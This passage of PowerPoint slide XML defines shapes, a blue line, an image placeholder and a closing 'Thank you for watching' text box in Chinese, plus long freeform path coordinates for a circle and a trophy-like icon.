            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="389254" h="439419">
                <a:moveTo>
                  <a:pt x="388747" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="204470"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="373252" y="438912"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="388747"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85" name="Freeform 85"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5662676" y="1976501"/>
            <a:ext cx="883919" cy="19050"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="883919" h="19050">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="883920" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="3C7CB3">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86" name="AutoShape 86"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7591425" y="257175"/>
            <a:ext cx="3686175" cy="542925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill dpi="0" rotWithShape="0">
            <a:blip r:embed="rId5">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7" name="TextBox 87"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4495800" y="2895600"/>
            <a:ext cx="3335020" cy="939800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16478" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="dist">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5625">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:alpha val="100000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="25400" dir="5400000">
                    <a:srgbClr val="6E747A">
                      <a:alpha val="43000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>谢谢观看</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="5625">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:alpha val="100000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="25400" dir="5400000">
                  <a:srgbClr val="6E747A">
                    <a:alpha val="43000"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="2030063" y="1554861"/>
            <a:ext cx="1096423" cy="1096804"/>
            <a:chOff x="2030063" y="1554861"/>
            <a:chExt cx="1096423" cy="1096804"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Freeform 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2030063" y="1554861"/>
              <a:ext cx="1096423" cy="1096804"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1482" h="1482">
                  <a:moveTo>
                    <a:pt x="1482" y="742"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1482" y="742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1481" y="780"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1477" y="818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1473" y="854"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1467" y="890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1458" y="926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1448" y="962"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1436" y="997"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1423" y="1029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1408" y="1063"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1392" y="1094"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1374" y="1126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1355" y="1155"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1334" y="1185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1312" y="1213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1289" y="1240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1265" y="1265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1239" y="1290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1211" y="1313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1184" y="1335"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1155" y="1356"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1125" y="1375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1094" y="1393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1062" y="1409"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1029" y="1424"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="995" y="1437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="961" y="1449"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="926" y="1459"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="890" y="1467"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853" y="1473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="816" y="1479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="778" y="1481"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="740" y="1482"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="740" y="1482"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="702" y="1481"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="664" y="1479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="627" y="1473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="592" y="1467"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="556" y="1459"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="520" y="1449"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="486" y="1437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="453" y="1424"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419" y="1409"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="388" y="1393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356" y="1375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327" y="1356"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297" y="1335"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="269" y="1313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="242" y="1290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217" y="1265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192" y="1240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="169" y="1213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147" y="1185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126" y="1155"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107" y="1126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89" y="1094"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73" y="1063"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58" y="1029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45" y="997"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33" y="962"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23" y="926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15" y="890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9" y="854"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3" y="818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="780"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="704"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3" y="666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9" y="629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15" y="592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23" y="556"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33" y="521"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45" y="486"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58" y="453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73" y="420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89" y="389"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107" y="357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126" y="327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147" y="299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="169" y="270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192" y="243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217" y="217"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="242" y="193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="269" y="169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297" y="148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327" y="127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356" y="107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="388" y="90"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419" y="74"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="453" y="59"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="486" y="46"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="520" y="34"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="556" y="24"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="592" y="15"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="627" y="9"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="664" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="702" y="1"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="740" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="740" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="778" y="1"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="816" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853" y="9"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="890" y="15"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="926" y="24"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="961" y="34"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="995" y="46"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1029" y="59"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1062" y="74"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1094" y="90"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1125" y="107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1155" y="127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1184" y="148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1211" y="169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1239" y="193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1265" y="217"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1289" y="243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1312" y="270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1334" y="299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1355" y="327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1374" y="357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1392" y="389"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1408" y="420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1423" y="453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1436" y="486"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1448" y="521"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1458" y="556"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1467" y="592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1473" y="629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1477" y="666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1481" y="704"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1482" y="742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1482" y="742"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="2F89C9">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:solidFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Freeform 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2211991" y="1813846"/>
              <a:ext cx="730853" cy="670465"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="988" h="905">
                  <a:moveTo>
                    <a:pt x="298" y="855"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="359" y="855"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="359" y="855"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="374" y="838"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="388" y="819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="401" y="799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412" y="776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="421" y="752"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="427" y="725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432" y="697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="436" y="666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425" y="666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425" y="666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418" y="666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412" y="664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="405" y="661"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="401" y="656"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="397" y="651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="393" y="646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="391" y="639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390" y="633"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390" y="633"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390" y="633"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="391" y="625"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="393" y="620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="397" y="613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="401" y="609"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="405" y="604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412" y="601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418" y="599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425" y="598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="442" y="598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="442" y="598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="417" y="573"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="393" y="546"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="371" y="519"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="351" y="489"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="337" y="512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="337" y="512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277" y="476"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="248" y="458"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="219" y="438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="191" y="418"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164" y="395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138" y="371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126" y="358"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114" y="345"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114" y="345"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="102" y="331"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92" y="317"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81" y="301"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71" y="285"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61" y="269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53" y="251"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44" y="234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36" y="216"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30" y="196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23" y="175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18" y="154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13" y="132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9" y="108"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6" y="84"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4" y="59"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3" y="33"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33" y="7"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239" y="55"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="252" y="58"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="252" y="58"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256" y="23"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="473" y="23"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="520" y="23"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="737" y="23"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="737" y="23"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="740" y="57"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="751" y="55"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="956" y="7"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="988" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="987" y="33"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="987" y="33"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="986" y="59"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="983" y="84"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="980" y="108"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="976" y="132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="971" y="154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="965" y="175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="960" y="196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="952" y="216"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="945" y="234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="936" y="251"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="927" y="269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="918" y="285"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="908" y="301"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="897" y="317"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="886" y="331"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="874" y="345"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="874" y="345"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="862" y="358"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="850" y="371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="825" y="395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="798" y="418"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="770" y="438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="742" y="458"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="713" y="476"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="653" y="512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="640" y="491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="640" y="491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620" y="521"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="599" y="548"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="576" y="574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="551" y="598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="567" y="598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="567" y="598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="574" y="599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="580" y="601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="586" y="604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="591" y="609"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="595" y="613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="599" y="620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="601" y="625"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="601" y="633"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="601" y="633"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="601" y="633"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="601" y="639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="599" y="646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="595" y="651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="591" y="656"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="586" y="661"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="580" y="664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="574" y="666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="567" y="666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="557" y="666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="557" y="666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="561" y="697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="565" y="725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="572" y="752"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="581" y="776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="592" y="799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="605" y="819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="619" y="838"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="634" y="855"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="697" y="855"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="713" y="905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="283" y="905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="298" y="855"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="298" y="855"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="988" h="905">
                  <a:moveTo>
                    <a:pt x="742" y="109"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="742" y="109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="741" y="157"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="737" y="203"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="731" y="247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="723" y="289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="719" y="310"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="714" y="331"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="707" y="350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="701" y="370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693" y="388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="685" y="407"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="678" y="425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="669" y="443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="669" y="443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="715" y="414"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="736" y="399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="758" y="383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="779" y="367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="798" y="349"/>
                  </a:lnTo>
                  <a:lnTo>
